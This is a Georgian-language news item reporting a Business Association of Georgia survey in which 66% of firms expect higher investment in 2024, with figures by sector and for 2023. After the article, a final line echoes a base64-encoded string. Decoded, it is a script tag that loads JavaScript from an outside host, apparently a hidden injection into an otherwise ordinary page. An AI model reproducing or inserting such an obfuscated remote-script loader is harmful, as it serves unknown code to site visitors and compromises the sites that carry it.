celsiusi
ავერსი საქკაბელი

 საქართველოს ბიზნეს ასოციაციის მიერ 2024 წლის პირველ კვარტალში გამოკითხული კომპანიების 66% აცხადებს, რომ 2024 წელს მათ მიერ განხორციელებული ინვესტიციები 2023 წელთან შედარებით გაიზრდება, 27% უცვლელ დონეზე შენარჩუნებას ვარაუდობს, ხოლო კლებას გამოკითხულთა 7% პროგნოზირებს.

საგულისხმოა, რომ 2024 წელს ინვესტიციების გაზრდას ან უცვლელ დონეზე შენარჩუნებას ჯამურად ბიზნესის 93% გეგმავს.

აღსანიშნავია, რომ 2024 წელს ყველაზე ოპტიმისტური საინვესტიციო მოლოდინი მშენებლობის სექტორს აქვს, კერძოდ, გამოკითხული კომპანიების 90% ინვესტიციების ზრდას გეგმავს. მრეწველობის სექტორში - 69%, ხოლო მომსახურებისა და ვაჭრობის სექტორებში - 63% პროგნოზირებს ინვესტიციების საერთო მოცულობის ზრდას.

რაც შეეხება გასული წლის მონაცემებს ინვესტიციების მიმართულებით, უნდა აღინიშნოს, რომ 2023 წელს გამოკითხული კომპანიების 70%-მა გაზარდა ინვესტიციები 2022 წელთან შედარებით. ვაჭრობის სექტორში, ჯამური ინვესტიციების ზრდა კომპანიების 76%-მა დააფიქსირა, მომსახურებისა და მრეწველობის სექტორებში 69%-მა, ხოლო მშენებლობაში - 50%-მა გაზარდა ინვესტიციები 2023 წელს.

შეგახსენებთ, რომ ინვესტიციების კვლევა BAG ინდექსის ფარგლებში წელიწადში ორჯერ ტარდება და საქართველოს ბიზნეს ასოციაციის წევრებისა და მათ ჯგუფში შემავალი კომპანიების საინვესტიციო საქმიანობას მიმოიხილავს. მიმდინარე კვლევა აჯამებს 2023 წელს განხორციელებულ ინვესტიციებს და მიმოიხილავს საინვესტიციო გეგმებს 2024 წლისთვის.

BAG ინდექსს საქართველოს ბიზნეს ასოციაცია და PMC კვლევითი ცენტრი ifo ეკონომიკური კვლევების ინსტიტუტის მეთოდოლოგიაზე დაყრდნობით აწარმოებს.

კვლევის ანგარიში შეგიძლიათ იხილოთ ბმულზე.

212
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");